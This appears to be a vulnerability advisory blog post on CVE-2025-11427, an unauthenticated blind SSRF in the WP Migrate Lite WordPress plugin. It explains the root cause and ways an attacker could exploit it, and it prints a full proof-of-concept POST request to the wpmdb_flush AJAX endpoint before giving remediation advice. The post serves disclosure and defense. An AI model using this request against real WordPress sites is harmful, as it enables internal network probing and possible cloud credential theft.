WP Migrate Lite (≈200k+ installs) is a widely used WordPress migration plugin designed to synchronize databases and media between sites. Migration workflows often require remote communication between WordPress instances, which makes request-handling logic highly sensitive to authentication, nonce validation, and strict URL allow-listing. In WP Migrate Lite 2.7.5, we identified CVE-2025-11427, an unauthenticated blind Server-Side Request Forgery (SSRF) vulnerability reachable through a publicly exposed AJAX endpoint. By sending crafted parameters to admin-ajax.php?action=wpmdb_flush without any WordPress cookies, an attacker can coerce the WordPress server into issuing a backend wp_remote_post() request to an arbitrary host, including internal services on 127.0.0.1, RFC1918 networks, or cloud metadata endpoints—enabling internal probing, service interaction, and potential chained compromise.
| CVE | CVE-2025-11427 |
| Plugin Version | WP Migrate Lite <= 2.7.6 |
| Critical | High |
| All Time | 7 802 873 |
| Active installations | 200 000+ |
| Publicly Published | November 17, 2025 |
| Last Updated | November 17, 2025 |
| Researcher | Dmitrii Ignatyev |
| PoC | Yes |
| Exploit | No |
| Reference | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-11427 https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-migrate-db/wp-migrate-lite-276-unauthenticated-blind-server-side-request-forgery |
| Plugin Security Certification by CleanTalk |  |
| Logo of the plugin |  |
PSC by CleantalkJoin the community of developers who prioritize security. Highlight your plugin in the WordPress catalog.
Timeline
| September 24, 2025 | Plugin testing and vulnerability detection in the WP Migrate Lite – Migration Made Easy have been completed |
| September 24, 2025 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing |
| November 17, 2025 | Registered CVE-2025-11427 |
Discovery of the Vulnerability
The root cause is an unauthenticated handler registered as wp_ajax_nopriv_wpmdb_flush, implemented in class/Common/Migration/Flush.php. This handler processes migration state without enforcing a capability check (current_user_can) or a CSRF nonce (check_ajax_referer). When the option wpmdb_migration_state is absent (or treated as a valid array), the code path falls back to trusting incoming request data. If the attacker supplies intent=push, the plugin constructs a remote target endpoint using attacker-controlled url via Util::ajax_url($url) (effectively $url/wp-admin/admin-ajax.php) and calls the remote via RemotePost::post() / wp_remote_post(). This results in blind SSRF: the attacker cannot always directly read the response body, but they can reliably trigger server-side requests and observe timing and side effects.
Understanding of SSRF attack’s
SSRF occurs when an application makes outbound HTTP requests based on untrusted input. In WordPress plugins, SSRF commonly appears in features that connect sites (migration/sync tools), fetch remote resources (image importers), or proxy API calls. The most dangerous SSRF variants allow access to internal services (admin panels on localhost, docker bridges, database management UIs) or cloud instance metadata endpoints such as 169.254.169.254 (AWS IMDS), enabling credential theft and infrastructure takeover. Even “blind” SSRF is highly valuable to attackers for:
- internal port scanning (timing differences)
- triggering internal webhooks/actions
- interacting with services that change state on POST
- chaining with open redirects or callback-based exfiltration
CVE-2025-11427 qualifies as high risk due to unauthenticated reachability and unrestricted destination control.
Exploiting the SSRF Vulnerability
To exploit CVE-2025-11427, an attacker without cookies:
POC:
POST /wordpress/wp-admin/admin-ajax.php?action=wpmdb_flush HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 Accept: */* Cookie: Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: http://127.0.0.1/wordpress/wp-admin/plugin-install.php?tab=popular&paged=7 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 42 Origin: http://127.0.0.1 Connection: keep-alive Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin intent=push&url=http://127.0.0.1:443&key=x____
- Internal service discovery: Blind SSRF can be used to identify open ports and internal HTTP endpoints through response time and error behavior.
- Interaction with internal admin interfaces: Internal services listening on localhost (CI/CD dashboards, debug endpoints, Redis HTTP proxies, admin panels) may accept requests from the WordPress host.
- Cloud credential exposure (chaining): While this bug is blind, internal endpoints that return credentials may still be exploitable via secondary exfil techniques if any callbacks/logging exist.
- DoS potential: Repeated SSRF requests to slow endpoints or non-routable IPs can exhaust PHP workers or outbound sockets.
- Pivot attacks: In some environments, SSRF to internal WordPress endpoints or admin-ajax routes can be chained with other unauthenticated logic bugs.
Given WP Migrate Lite’s large install base and the unauthenticated nature of the endpoint, exploitation is realistic at scale.
Recommendations for Improved Security
For maintainers (WP Migrate Lite):
- Remove
noprivregistration forwpmdb_flushentirely unless there is a strong architectural need. Migration state endpoints should be authenticated-only. - Enforce capability checks: require
current_user_can('manage_options')(or a plugin-specific capability) before processing migration state. - Require nonce verification: add
check_ajax_referer('wpmdb_flush', 'nonce')and reject requests missing/invalid nonces. - Harden URL handling: if remote connections are required, enforce an allowlist of known migration targets, block loopback/RFC1918/link-local ranges, and prevent redirect-based bypasses.
- Add network safeguards: set strict timeouts, limit redirects, and log anomalous targets for incident response.
For site owners:
- Update to a patched release immediately once available.
- Use a WAF rule to block
action=wpmdb_flushrequests from unauthenticated users. - Restrict outbound connectivity from the WordPress host (egress filtering) to prevent SSRF pivots.
- Monitor access logs for spikes on
/admin-ajax.php?action=wpmdb_flush.
By taking proactive measures to address SSRF vulnerabilities like CVE-2025-11427 WordPress website owners can enhance their security posture and safeguard against potential exploitation. Stay vigilant, stay secure.
#WordPressSecurity #SSRF #WebsiteSafety #StayProtected #HighVulnerability
Use CleanTalk solutions to improve the security of your website
Dmitrii I.